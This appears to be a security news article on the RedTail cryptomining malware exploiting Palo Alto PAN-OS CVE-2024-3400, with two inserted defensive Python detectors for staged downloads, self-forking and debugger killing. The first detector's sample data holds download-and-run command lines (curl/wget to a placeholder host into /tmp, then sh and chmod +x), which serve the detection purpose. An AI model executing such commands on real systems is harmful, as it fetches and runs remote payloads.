The threat actors behind the RedTail cryptocurrency mining malware have added a recently disclosed security flaw affecting Palo Alto Networks firewalls to their exploit arsenal.
The addition of the PAN-OS vulnerability to its toolbox has been complemented by updates to the malware, which now incorporates new anti-analysis techniques, according to findings from web infrastructure and security company Akamai.
"The attackers have taken a step forward by employing private crypto-mining pools for greater control over mining outcomes despite the increased operational and financial costs," security researchers Ryan Barnett, Stiv Kupchik, and Maxim Zavodchik said in a technical report shared with The Hacker News.
The infection sequence discovered by Akamai leverages a now-patched vulnerability in PAN-OS tracked as CVE-2024-3400 (CVSS score: 10.0) that could allow an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Successful exploitation is followed by the execution of commands designed to retrieve and run a bash shell script from an external domain that, in turn, is responsible for downloading the RedTail payload based on the CPU architecture.
Other propagation vectors for RedTail include the exploitation of known security flaws in TP-Link routers (CVE-2023-1389), ThinkPHP (CVE-2018-20062), Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887), and VMware Workspace ONE Access and Identity Manager (CVE-2022-22954).
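The post-exploitation chain described above (fetch a script from an external host, run it with a shell, let it pull an architecture-specific payload) is a generic staging pattern that execve telemetry from auditd or an EDR agent can surface regardless of which CVE opened the door. The following Python is an added example, not Akamai's detection logic and not RedTail's actual commands: it tags a constructed sequence of command lines for the individual stages and reports whether the stages seen together form a staged-download chain. The host name `example.invalid`, the file paths and the architecture directory are placeholders.

```python
import re

# Constructed execve-style events as a host agent might record them after a
# compromise. Host, paths and file names are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"pid": 4120, "user": "root", "cmdline": "curl -s http://example.invalid/r.sh -o /tmp/r.sh"},
    {"pid": 4121, "user": "root", "cmdline": "/bin/sh /tmp/r.sh"},
    {"pid": 4130, "user": "root", "cmdline": "wget http://example.invalid/x86_64/payload -O /tmp/.m"},
    {"pid": 4131, "user": "root", "cmdline": "chmod +x /tmp/.m"},
    {"pid": 5001, "user": "www",  "cmdline": "curl https://updates.example.invalid/release-notes.txt"},
    {"pid": 5002, "user": "root", "cmdline": "apt-get update"},
]

DOWNLOADERS = ("curl", "wget")
STAGING_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Architecture names that show up in per-arch payload paths; short tokens such
# as "arm" are deliberately omitted to avoid matching ordinary words.
ARCH_TOKENS = ("x86_64", "i686", "aarch64", "arm64", "armv7", "mips", "mipsel")
SHELLS = ("sh", "bash", "dash", "ash")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|a)?sh\b")


def first_word(cmdline):
    """Return the basename of the executed program, e.g. '/bin/sh' -> 'sh'."""
    parts = cmdline.split()
    return parts[0].rsplit("/", 1)[-1] if parts else ""


def classify(event):
    """Tag a single command line with the staging behaviours it exhibits."""
    cmd = event["cmdline"]
    tool = first_word(cmd)
    tags = []
    if tool in DOWNLOADERS:
        if any(d in cmd for d in STAGING_DIRS):
            tags.append("download_to_staging_dir")
        if any(tok in cmd for tok in ARCH_TOKENS):
            tags.append("arch_specific_payload")
    if PIPE_TO_SHELL.search(cmd):
        tags.append("pipe_to_shell")
    if tool in SHELLS and any(d in cmd for d in STAGING_DIRS):
        tags.append("shell_runs_staged_script")
    if tool == "chmod" and "+x" in cmd and any(d in cmd for d in STAGING_DIRS):
        tags.append("chmod_exec_staged_file")
    # Root context matters: on an appliance the exploited service runs as root.
    if tags and event["user"] == "root":
        tags.append("as_root")
    return tags


def scan(events):
    """Return (pid, tags) for every event that carries at least one tag."""
    results = []
    for e in events:
        tags = classify(e)
        if tags:
            results.append((e["pid"], tags))
    return results


def chain_verdict(events):
    """Escalate only when a download into a staging dir is followed by a shell
    executing something from a staging dir; isolated hits stay informational."""
    seen = set()
    for _, tags in scan(events):
        seen.update(tags)
    needed = {"download_to_staging_dir", "shell_runs_staged_script"}
    return "staged payload chain" if needed <= seen else "no chain"


if __name__ == "__main__":
    for pid, tags in scan(SAMPLE_EVENTS):
        print(pid, tags)
    print(chain_verdict(SAMPLE_EVENTS))
```

The chain-level verdict is what makes this usable on a noisy fleet: a lone `curl` into `/tmp` by an operator is common, while a download into a staging directory followed by a shell executing from one, both as root, on a firewall that should never do either, is worth an alert.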
RedTail was initially disclosed by security researcher Patryk Machowiak in January 2024 in reference to a campaign that exploited the Log4Shell vulnerability (CVE-2021-44228) to distribute the malware on Unix-based computers.
Then in March 2024, Barracuda Networks reported attacks exploiting flaws in SonicWall (CVE-2019-7481) and Visual Tools DVR (CVE-2021-42071) to install Mirai botnet variants, as well as flaws in ThinkPHP to deploy RedTail.
The latest version of the miner, spotted in April, includes major upgrades, most notably an encrypted mining configuration that is used to launch the embedded XMRig miner.
Another significant change is the removal of a cryptocurrency wallet, suggesting that the threat actors may have switched to a private mining pool or a pool proxy to collect their financial rewards.
"The configuration also shows that the threat actors are trying to optimize the mining operation as much as possible, indicating a deep understanding of crypto-mining," the researchers stated.
"Unlike the last RedTail strain revealed in early 2024, this virus exploits enhanced evasion and persistence capabilities. It forks itself numerous times to hamper analysis by debugging its process and destroys each instance of [GNU Debugger] it discovers."
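The two anti-analysis behaviours quoted above, repeated self-forking and termination of any debugger found on the host, both leave traces in ordinary process telemetry. The Python below is an added example of how a defender could look for them, not Akamai's detection code and not a description of RedTail's internals: it walks a constructed process snapshot (as `ps -eo pid,ppid,comm` would show it) for unusually deep chains of a process re-spawning itself, and correlates constructed kill-signal events against that snapshot to catch signals sent to debugger processes. The process name `.m` and all PIDs are placeholders.

```python
# Constructed process snapshot: (pid, ppid, comm). The ".m" chain models a
# binary that forks itself repeatedly; nginx is included as a benign
# master/worker pair that must not be flagged.
SNAPSHOT = [
    (1, 0, "systemd"),
    (700, 1, "sshd"),
    (900, 1, "nginx"),
    (901, 900, "nginx"),
    (902, 900, "nginx"),
    (2210, 1, ".m"),
    (2211, 2210, ".m"),
    (2212, 2211, ".m"),
    (2213, 2212, ".m"),
    (2214, 2213, ".m"),
    (2300, 1, "gdb"),
]

# Constructed signal events, e.g. from auditd kill() syscall records or an EDR.
KILL_EVENTS = [
    {"actor_pid": 2214, "target_pid": 2300, "signal": 9},   # SIGKILL at the debugger
    {"actor_pid": 700,  "target_pid": 701,  "signal": 15},  # sshd reaping a session
]

DEBUGGERS = ("gdb", "strace", "ltrace")


def build_index(snapshot):
    """Map pid -> (ppid, comm) for O(1) ancestry lookups."""
    return {pid: (ppid, comm) for pid, ppid, comm in snapshot}


def self_fork_depth(pid, index):
    """Count consecutive ancestors (pid included) that share pid's comm.
    A normal service yields 1 or 2 (master/worker); a process that keeps
    re-forking itself to shake off a debugger yields a much longer chain."""
    comm = index[pid][1]
    depth = 0
    cur = pid
    while cur in index and index[cur][1] == comm:
        depth += 1
        cur = index[cur][0]  # move to the parent
    return depth


def find_fork_chains(snapshot, min_depth=4):
    """Return {comm: (deepest leaf pid, chain depth)} for chains >= min_depth."""
    index = build_index(snapshot)
    deepest = {}
    for pid, _, comm in snapshot:
        d = self_fork_depth(pid, index)
        if d >= min_depth and d > deepest.get(comm, (0, 0))[1]:
            deepest[comm] = (pid, d)
    return deepest


def find_debugger_kills(kill_events, snapshot, debuggers=DEBUGGERS):
    """Flag signals whose target is a debugger process in the snapshot."""
    index = build_index(snapshot)
    hits = []
    for ev in kill_events:
        target = index.get(ev["target_pid"])
        if target and target[1] in debuggers:
            actor_comm = index.get(ev["actor_pid"], (None, "?"))[1]
            hits.append({
                "actor_pid": ev["actor_pid"],
                "actor_comm": actor_comm,
                "target_comm": target[1],
                "signal": ev["signal"],
            })
    return hits


if __name__ == "__main__":
    print("self-fork chains:", find_fork_chains(SNAPSHOT))
    print("debugger kills:", find_debugger_kills(KILL_EVENTS, SNAPSHOT))
```

The fork-depth threshold is the tuning knob: a value of 4 leaves master/worker daemons alone while still catching a process that re-spawns itself several levels deep, and the two detections corroborate each other when the same process name appears in both results.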
Akamai described RedTail as having a high degree of polish, a characteristic not commonly seen among crypto-mining malware families in the wild.
Exactly who is behind the cryptocurrency mining malware is currently not known, but the use of private crypto-mining pools mirrors a technique employed by the North Korea-linked Lazarus Group, which has a history of orchestrating wide-ranging cyber attacks for financial gain, the company said.
"The investments required to run a private crypto-mining operation are significant, including staffing, infrastructure, and obfuscation," the researchers found. "This sophistication may be indicative of a nation-state-sponsored attack group."